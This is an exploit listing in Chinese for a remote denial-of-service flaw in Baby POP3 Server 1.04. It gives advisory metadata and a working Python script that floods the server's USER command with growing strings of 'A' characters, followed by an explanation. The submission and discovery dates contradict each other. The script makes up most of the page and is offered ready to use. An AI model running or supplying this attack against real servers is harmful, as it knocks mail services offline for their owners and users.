DOS Baby POP3 Server 1.04
2025年8月28日 提交者:Érick Sousa
风险等级: 中危 本地利用: 否 远程利用: 是 CVE编号: 暂无 CWE编号: 暂无
漏洞信息
漏洞标题: DOS Baby POP3 Server 1.04 发现日期: 2025年12月8日 漏洞作者: Érick Sousa (www.linkedin.com/in/erickssa) 厂商主页: www.pablosoftwaresolutions.com 软件链接: www.pablosoftwaresolutions.com/html/baby_p… 影响版本: Baby POP3 Server Version 1.04 测试环境: Windows XP 和 Windows 7
利用代码
# Python 3.13.5 ;)
import socket
jkcode = b"A"
counter = 0
while counter < 10000:
counter += 10
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.18.240", 110))
s.send(b"USER " + jkcode * counter + b"\r\n")
s.close()
技术说明
该漏洞利用代码通过Python的socket库连接到目标POP3服务器(默认端口110),循环发送包含大量"A"字符的USER命令。每次迭代增加10个字符,最多发送10000个字符,导致目标服务器资源耗尽从而实现拒绝服务攻击。